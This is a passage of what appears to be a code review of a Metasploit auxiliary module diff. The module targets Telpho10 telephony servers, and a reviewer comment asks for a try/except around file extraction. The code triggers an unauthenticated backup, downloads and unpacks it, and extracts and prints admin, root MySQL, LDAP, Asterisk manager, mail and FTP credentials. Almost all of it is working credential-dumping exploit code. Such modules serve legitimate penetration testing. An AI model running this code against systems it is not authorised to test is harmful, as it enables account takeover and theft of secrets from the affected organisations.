modules/auxiliary/admin/http/telpho10_credential_dump.rb

```diff
@@ -0,0 +1,151 @@
+            File.open(dest, 'wb') do |f|
+              f.write(entry.read)
+            end
+          File.chmod(entry.header.mode, dest)
+          end
+        end
+      end
+    end
+    return destination
+  end
+
+  # search for credentials in backup file
+  def dump_creds(mysql_file)
+    file = File.new(mysql_file, 'r')
+    while (line = file.gets)
+      if line.include? 'adminusername'
+        config = [line]
+      end
+    end
+    file.close
+
+
+    print_status('Login (/telpho/login.php)')
+    print_status('-------------------------')
+    print_good('Username: ' + config.first[/adminusername\',\'(.*?)\'/, 1])
+    print_good('Password: ' + config.first[/adminpassword\',\'(.*?)\'/, 1] + "\n")
+
+    print_status('MySQL (/phpmyadmin)')
+    print_status('-------------------')
+    print_good('Username: root')
+    print_good('Password: ' + config.first[/dbpassword\',\'(.*?)\'/, 1] + "\n")
+
+    print_status('LDAP (/phpldapadmin)')
+    print_status('--------------------')
+    print_good('Username: ' + 'cn=admin,dc=localdomain')
+    print_good('Password: ' + config.first[/ldappassword\',\'(.*?)\'/, 1] + "\n")
+
+    print_status('Asterisk MI (port 5038)')
+    print_status('-----------------------')
+    print_good('Username: ' + config.first[/manageruser\',\'(.*?)\'/, 1])
+    print_good('Password: ' + config.first[/managersecret\',\'(.*?)\'/, 1] + "\n")
+
+    print_status('Mail configuration')
+    print_status('------------------')
+    print_good('Mailserver: ' + config.first[/ipsmarthost\',\'(.*?)\'/, 1])
+    print_good('Username:   ' + config.first[/mailusername\',\'(.*?)\'/, 1])
+    print_good('Password:   ' + config.first[/mailpassword\',\'(.*?)\'/, 1])
+    print_good('Mail from:  ' + config.first[/mailfrom\',\'(.*?)\'/, 1] + "\n")
+
+    print_status('Online Backup')
+    print_status('-------------')
+    print_good('ID:        ' + config.first[/ftpbackupid\',\'(.*?)\'/, 1])
+    print_good('Password:  ' + config.first[/ftpbackuppw\',\'(.*?)\'/, 1] + "\n")
+
+  end
+
+  def run
+    res = send_request_cgi({
+      'uri'  => '/telpho/system/backup.php',
+      'method' => 'GET'
+    })
+    if res && res.code == 200
+      print_status('Generating backup')
+      sleep(1)
+    else
+      print_error("Could not find vulnerable script. Aborting.")
+      return nil
+    end
+
+    print_status('Downloading backup')
+    res = send_request_cgi({
+      'uri'    => '/telpho/temp/telpho10.epb',
+      'method' => 'GET'
+    })
+    if res && res.code == 200
+      if res.body.to_s.bytesize == 0
+        print_error('0 bytes returned, file does not exist or is empty.')
+        return nil
+      end
+
+      path = store_loot(
+        'telpho10.backup',
+        'application/x-compressed',
+        datastore['RHOST'],
+        res.body,
+        'backup.tar'
+      )
+      print_good("File saved in: #{path}")
+
+      extracted = untar("#{path}")
+      mysql = untar("#{extracted}/mysql.tar")
```

Comment:
99.9% chance this file will be there at this point, but its also taking a blind leap, maybe a try/except wrapper would be a good idea?  That may help future proof this in case a new version changes the file name or something else like that